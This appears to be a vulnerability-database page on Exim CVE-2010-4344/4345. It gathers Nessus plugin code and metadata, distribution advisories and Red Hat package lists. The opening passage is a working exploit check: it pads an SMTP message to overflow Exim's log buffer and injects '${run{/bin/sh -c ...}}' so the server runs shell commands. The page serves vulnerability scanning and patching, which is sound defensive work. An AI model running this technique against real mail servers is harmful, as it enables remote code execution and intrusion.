    # And on Debian (the one we're checking for):
    #rejected from <root@localhost> H=(hostname) [192.168.103.1]: message too big: read=56725188 max=52428800
    #
    # Unfortunately, we can't check them all, so we're going to use Debian's default
    buffer_size = buffer_size - strlen("rejected from <" + from + "> H=(" + hostname + ") [" + ip + "]: message too big: read=" + max_size + " max=" + max_size + "\n");
    
    # string_format: 'Envelope-from: <%s>\n' => Envelope-from: <root@localhost>\n
    buffer_size = buffer_size - strlen('Envelope-from: <' + from + '>\n');
    
    # string_format: 'Envelope-to: <%s>\n' => Envelope-to: <postmaster@localhost>\n
    buffer_size = buffer_size - strlen('Envelope-to: <' + to + '>\n');
    
    # At this point, the buffer should be approximately 8000 bytes long. We need to use up all but three. 
    # Build the buffer for 'data' that will use it all up
    data_buffer = '';
    chunk = crap(12) + ': ' + crap(100) + '\n';
    
    # We want 3 bytes left in the buffer at the end, so substract them now (that way, we can work with 0 as a target)
    buffer_size = buffer_size - 4;
    
    # This loop is a little tricky, and was by far the hardest part (for me, at least). Basically, we have approximately
    # 8000 bytes to use up. But we have to be exact to trigger the vulnerability. Each time we add a line to the array, 
    # it uses up 2 extra bytes (string_vformat is called with "%c %s", and winds up with two spaces at the start - I'm 
    # not sure what the '%c' means in thnis case).
    #
    # To make sure we don't wind up with under 3 bytes, we stop when there's between #chunk and
    # #chunk * 2 bytes left and add the last two lines. That means that, at a minimum, both lines
    # will be #chunk/2 bytes long. 
    while(buffer_size >= strlen(chunk) * 2)
    {
      to_add = '';
    
      data_buffer = data_buffer + chunk;
      buffer_size = buffer_size - strlen(chunk) - 2;
    }
    
    # The two pairs of extra bytes
    buffer_size = buffer_size - 4;
    
    # The new newlines
    buffer_size = buffer_size - 2;
    
    # The length of the two strings without newlines
    s1 = buffer_size / 2;
    s2 = buffer_size - s1;
    
    # Finally, add them, which will create the string that exactly overflows the buffer
    data_buffer = data_buffer + substr(chunk, 0, s1) + '\n'; 
    data_buffer = data_buffer + substr(chunk, 0, s2) + '\n'; 
    
    # Add the command that'll overflow the ACL
    data_buffer = data_buffer + crap(7) + ": ";
    for(i = 0; i < 100; i++)
      for(j = 3; j < 12; j++)
        data_buffer = data_buffer + "${run{/bin/sh -c '" + command + ">&" + j + "'}} ";
    data_buffer = data_buffer + '\n';
    
    # Send it all
    send(socket:socket, data:data_buffer);
    
    # Next, send a really really really long string. The purpose of this is the cause the mail server
    # to return an error ("message too long"). We do this in a loop so we don't have to allocate 50mb
    # of buffer space and annoy the memory manager. 
    for(i = 0; i < 10; i++)
      send(socket:socket, data:crap(data:crap(255) + '\n', length: max_size/10));
    
    # Terminate the email
    send(socket:socket, data:'\n.\n');
    
    # Receive the response, which should be:
    # 552 Message size exceeds maximum permitted
    response = recv_line( socket:socket, length:1024);
    if("552 Message size exceeds maximum permitted" >!< response)
      exit(1, "The Exim install listening on port "+port+" didn't reject the oversized message.");
    
    # Send another MAIL FROM. This will cause the boobytrapped ACL to be run, which in turn
    # causes the command to be run. 
    send(socket:socket, data:"MAIL FROM: " + from + '\n');
    
    # If the overflow was successful, it'll return the command_match string multiple times. 
    # If it was unsuccessful, it'll return '250 OK' (in other words, accept the email). 
    while(TRUE)
    {
      response = recv_line( socket:socket, length:1024);
      if (!response)
        exit(0, "The Exmin install listening on port "+port+" does not appear to be vulnerable.");
      if ("250 OK" >< response)
        exit(0, "The Exim install listening on port "+port+" is not vulnerable or has a non-standard log configuration.");
      if (command_match >< response)
      {
        if (report_verbosity > 0)
        {
          report = '\n' +
            'Nessus was able to exploit the vulnerability to execute the command\n' +
            '\'' + command + '\' on the remote host, which produced the following output :\n' +
            '\n' +
            crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
            data_protection::sanitize_uid(output:chomp(response)) + '\n' +
            crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
          security_hole(port:port, extra:report);
        }
        else security_hole(port);
        exit(0);
      }
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE_11_2_EXIM-101211.NASL
    descriptionremote attackers could trick exim into running arbitrary code (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain root access (CVE-2010-4345).
    last seen2020-06-01
    modified2020-06-02
    plugin id53715
    published2011-05-05
    reporterThis script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/53715
    titleopenSUSE Security Update : exim (openSUSE-SU-2010:1052-1)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from openSUSE Security Update exim-3680.
    #
    # The text description of this plugin is (C) SUSE LLC.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(53715);
      script_version("1.10");
      script_cvs_date("Date: 2019/10/25 13:36:38");
    
      script_cve_id("CVE-2010-4344", "CVE-2010-4345");
    
      script_name(english:"openSUSE Security Update : exim (openSUSE-SU-2010:1052-1)");
      script_summary(english:"Check for the exim-3680 patch");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote openSUSE host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "remote attackers could trick exim into running arbitrary code
    (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain
    root access (CVE-2010-4345)."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.novell.com/show_bug.cgi?id=658731"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://lists.opensuse.org/opensuse-updates/2010-12/msg00029.html"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected exim packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:exim");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:eximon");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:eximstats-html");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.2");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2010/12/11");
      script_set_attribute(attribute:"plugin_publication_date", value:"2011/05/05");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
    if (release !~ "^(SUSE11\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.2", release);
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    flag = 0;
    
    if ( rpm_check(release:"SUSE11.2", reference:"exim-4.69-72.6.1") ) flag++;
    if ( rpm_check(release:"SUSE11.2", reference:"eximon-4.69-72.6.1") ) flag++;
    if ( rpm_check(release:"SUSE11.2", reference:"eximstats-html-4.69-72.6.1") ) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "exim / eximon / eximstats-html");
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE_11_1_EXIM-101211.NASL
    descriptionremote attackers could trick exim into running arbitrary code (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain root access (CVE-2010-4345).
    last seen2020-06-01
    modified2020-06-02
    plugin id53657
    published2011-05-05
    reporterThis script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/53657
    titleopenSUSE Security Update : exim (openSUSE-SU-2010:1052-1)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-2131.NASL
    descriptionSeveral vulnerabilities have been found in exim4 that allow a remote attacker to execute arbitrary code as root user. Exploits for these issues have been seen in the wild. This update fixes a memory corruption issue that allows a remote attacker to execute arbitrary code as the Debian-exim user (CVE-2010-4344 ). A fix for an additional issue that allows the Debian-exim user to obtain root privileges (CVE-2010-4345 ) is currently being checked for compatibility issues. It is not yet included in this upgrade but will released soon in an update to this advisory.
    last seen2020-06-01
    modified2020-06-02
    plugin id51128
    published2010-12-12
    reporterThis script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/51128
    titleDebian DSA-2131-1 : exim4 - arbitrary code execution
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2010-0970.NASL
    descriptionUpdated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim
    last seen2020-06-01
    modified2020-06-02
    plugin id51780
    published2011-01-28
    reporterThis script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/51780
    titleCentOS 4 : exim (CESA-2010:0970)
  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20101210_EXIM_ON_SL4_X.NASL
    descriptionA buffer overflow flaw was discovered in Exim
    last seen2020-06-01
    modified2020-06-02
    plugin id60919
    published2012-08-01
    reporterThis script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/60919
    titleScientific Linux Security Update : exim on SL4.x, SL5.x i386/x86_64
  • NASL familySuSE Local Security Checks
    NASL idSUSE_11_3_EXIM-101211.NASL
    descriptionremote attackers could trick exim into running arbitrary code (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain root access (CVE-2010-4345).
    last seen2020-06-01
    modified2020-06-02
    plugin id75481
    published2014-06-13
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/75481
    titleopenSUSE Security Update : exim (openSUSE-SU-2010:1052-1)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201401-32.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201401-32 (Exim: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Exim. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could possibly execute arbitrary code with root privileges, or cause a Denial of Service condition. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id72159
    published2014-01-28
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/72159
    titleGLSA-201401-32 : Exim: Multiple vulnerabilities
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-1032-1.NASL
    descriptionSergey Kononenko and Eugene Bujak discovered that Exim did not correctly truncate string expansions. A remote attacker could send specially crafted email traffic to run arbitrary code as the Exim user, which could also lead to root privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id51136
    published2010-12-12
    reporterUbuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/51136
    titleUbuntu 6.06 LTS / 8.04 LTS / 9.10 : exim4 vulnerability (USN-1032-1)

Packetstorm

Redhat

advisories
bugzilla
id661756
titleCVE-2010-4344 exim remote code execution flaw
oval
OR
  • commentRed Hat Enterprise Linux must be installed
    ovaloval:com.redhat.rhba:tst:20070304026
  • AND
    • commentRed Hat Enterprise Linux 4 is installed
      ovaloval:com.redhat.rhba:tst:20070304025
    • OR
      • AND
        • commentexim-mon is earlier than 0:4.43-1.RHEL4.5.el4_8.1
          ovaloval:com.redhat.rhsa:tst:20100970001
        • commentexim-mon is signed with Red Hat master key
          ovaloval:com.redhat.rhsa:tst:20100970002
      • AND
        • commentexim is earlier than 0:4.43-1.RHEL4.5.el4_8.1
          ovaloval:com.redhat.rhsa:tst:20100970003
        • commentexim is signed with Red Hat master key
          ovaloval:com.redhat.rhsa:tst:20100970004
      • AND
        • commentexim-sa is earlier than 0:4.43-1.RHEL4.5.el4_8.1
          ovaloval:com.redhat.rhsa:tst:20100970005
        • commentexim-sa is signed with Red Hat master key
          ovaloval:com.redhat.rhsa:tst:20100970006
      • AND
        • commentexim-doc is earlier than 0:4.43-1.RHEL4.5.el4_8.1
          ovaloval:com.redhat.rhsa:tst:20100970007
        • commentexim-doc is signed with Red Hat master key
          ovaloval:com.redhat.rhsa:tst:20100970008
  • AND
    • commentRed Hat Enterprise Linux 5 is installed
      ovaloval:com.redhat.rhba:tst:20070331005
    • OR
      • AND
        • commentexim-mon is earlier than 0:4.63-5.el5_5.2
          ovaloval:com.redhat.rhsa:tst:20100970010
        • commentexim-mon is signed with Red Hat redhatrelease key
          ovaloval:com.redhat.rhsa:tst:20100970011
      • AND
        • commentexim is earlier than 0:4.63-5.el5_5.2
          ovaloval:com.redhat.rhsa:tst:20100970012
        • commentexim is signed with Red Hat redhatrelease key
          ovaloval:com.redhat.rhsa:tst:20100970013
      • AND
        • commentexim-sa is earlier than 0:4.63-5.el5_5.2
          ovaloval:com.redhat.rhsa:tst:20100970014
        • commentexim-sa is signed with Red Hat redhatrelease key
          ovaloval:com.redhat.rhsa:tst:20100970015
rhsa
idRHSA-2010:0970
released2010-12-10
severityCritical
titleRHSA-2010:0970: exim security update (Critical)
rpms
  • exim-0:4.43-1.RHEL4.5.el4_7.1
  • exim-0:4.43-1.RHEL4.5.el4_8.1
  • exim-0:4.63-3.el5_3.1
  • exim-0:4.63-3.el5_4.1
  • exim-0:4.63-5.el5_5.2
  • exim-debuginfo-0:4.43-1.RHEL4.5.el4_7.1
  • exim-debuginfo-0:4.43-1.RHEL4.5.el4_8.1
  • exim-debuginfo-0:4.63-3.el5_3.1
  • exim-debuginfo-0:4.63-3.el5_4.1
  • exim-debuginfo-0:4.63-5.el5_5.2
  • exim-doc-0:4.43-1.RHEL4.5.el4_7.1
  • exim-doc-0:4.43-1.RHEL4.5.el4_8.1
  • exim-mon-0:4.43-1.RHEL4.5.el4_7.1
  • exim-mon-0:4.43-1.RHEL4.5.el4_8.1
  • exim-mon-0:4.63-3.el5_3.1
  • exim-mon-0:4.63-3.el5_4.1
  • exim-mon-0:4.63-5.el5_5.2
  • exim-sa-0:4.43-1.RHEL4.5.el4_7.1
  • exim-sa-0:4.43-1.RHEL4.5.el4_8.1
  • exim-sa-0:4.63-3.el5_3.1
  • exim-sa-0:4.63-3.el5_4.1
  • exim-sa-0:4.63-5.el5_5.2

References